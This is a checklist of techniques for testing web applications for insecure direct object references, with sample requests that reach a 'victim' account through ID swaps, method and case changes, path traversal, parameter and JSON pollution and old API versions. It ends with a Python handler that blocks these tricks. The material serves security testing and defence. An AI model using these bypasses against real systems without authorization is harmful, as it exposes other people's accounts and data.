Account Setup: Create two accounts or enumerate users first.
Endpoint Check: Determine if the endpoint is private or public and if it contains any ID parameter.
Parameter Manipulation: Change the parameter value to another user's ID and observe any changes to their account.
Done!
Profile Actions: Check actions like profile image, account deletion, account information, API key management, comment reading, price changes, and currency conversions (e.g., dollar to euro).
ID Decoding: If the ID is encoded (e.g., MD5, base64), try decoding it.
Example: GET /GetUser/dmljdGltQG1haWwuY29t (base64 of victim@mail.com)
HTTP Method Change: Test different HTTP methods.
Example:
GET /users/delete/victim_id → 403
POST /users/delete/victim_id → 200
Parameter Replacement: Swap parameter names.
Instead of GET /api/albums?album_id=<album id>, try GET /api/albums?account_id=<account id>.
Burp Extension: Use Paramalyzer to remember all parameters passed to a host.
Path Traversal:
POST /users/delete/victim_id → 403
POST /users/delete/my_id/..victim_id → 200
Change Request Content-Type:
Change from Content-Type: application/xml to Content-Type: application/json.
ID Swap: Swap non-numeric IDs with numeric ones.
GET /file?id=90djbkdbkdbd29dd
GET /file?id=302
Function Level Access Control:
GET /admin/profile → 401
GET /Admin/profile → 200 (and variations)
Wildcard Parameter:
GET /api/users/user_id → GET /api/users/*
Encoded/Hashed ID: Never ignore encoded/hashed IDs. Create multiple accounts to understand patterns.
Google Dorking: Search for indexed endpoints containing IDs.
Brute Force Hidden Parameters: Use tools like Arjun or ParamMiner.
Bypass Object Level Authorization: Add parameters to endpoints if not present by default.
GET /api_v1/messages → 200
GET /api_v1/messages?user_id=victim_uuid → 200
HTTP Parameter Pollution: Send multiple values for the same parameter.
GET /api_v1/messages?user_id=attacker_id&user_id=victim_id
Change File Type:
GET /user_data/2341 → 401
GET /user_data/2341.json → 200 (and other extensions)
JSON Parameter Pollution:
Example: {"userid":1234,"userid":2542}
Wrap ID in Array:
{"userid":123} → 401
{"userid":[123]} → 200
Wrap ID in JSON Object:
{"userid":{"userid":123}} → 200
Outdated API Version:
GET /v3/users_data/1234 → 401
GET /v1/users_data/1234 → 200
GraphQL IDOR Testing: If using GraphQL, test for IDOR.
GET /graphql
GET /graphql.php?query=
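From the defender's side, nearly every check in this list probes the same gap: authorization decided from request-supplied identity or from the literal spelling of the URL, instead of from the session and the record being touched. The handler below is an added example, not code from the original page: it normalises URL variants (case, file extension, API version) onto one route, refuses duplicate JSON keys, polluted query parameters and array/object-wrapped IDs, and compares the record's owner to the session user for every HTTP method. The message store and route shape are constructed for the demonstration.

```python
import json
import re
from urllib.parse import parse_qs

MESSAGES = {1234: 7, 2542: 9}  # constructed store: message id -> owner user id

def parse_json_strict(body: str) -> dict:
    # json.loads keeps the LAST duplicate key, so {"userid":1234,"userid":2542}
    # would silently become 2542; refuse duplicate keys instead.
    def no_dupes(pairs):
        if len({k for k, _ in pairs}) != len(pairs):
            raise ValueError("duplicate JSON key")
        return dict(pairs)
    return json.loads(body, object_pairs_hook=no_dupes)

def canonical_id(value) -> int:
    # An object ID is a bare positive integer; [123], {"userid":123}, "302." and
    # true are rejected rather than coerced.
    if isinstance(value, bool) or not isinstance(value, int) or value <= 0:
        raise ValueError("invalid id shape")
    return value

def rejected(fn, *args) -> bool:
    # True when the strict parser refuses the input (shows what gets blocked).
    try:
        fn(*args)
    except ValueError:
        return True
    return False

def handle(method: str, path: str, query: str, body: str, session_user: int) -> int:
    # Returns an HTTP status. Every spelling of the URL (/Admin, /2341.json, /v1 vs
    # /v3) is normalised to one route, so the ownership check below is never skipped.
    norm = re.sub(r"\.[a-z0-9]+$", "", path.lower())
    m = re.fullmatch(r"/api/v\d+/messages/(\d+)", norm)
    if m is None:
        return 404
    # Client-supplied identity (user_id in query or body) is never consulted;
    # sending it twice is malformed input, not a hint to pick one value.
    if len(parse_qs(query, keep_blank_values=True).get("user_id", [])) > 1:
        return 400
    try:
        msg_id = canonical_id(int(m.group(1)))
        parse_json_strict(body or "{}")
    except ValueError:
        return 400
    owner = MESSAGES.get(msg_id)
    if owner is None:
        return 404
    # Same rule for GET, POST and DELETE: the record's owner must be the session user.
    return 200 if owner == session_user else 403
```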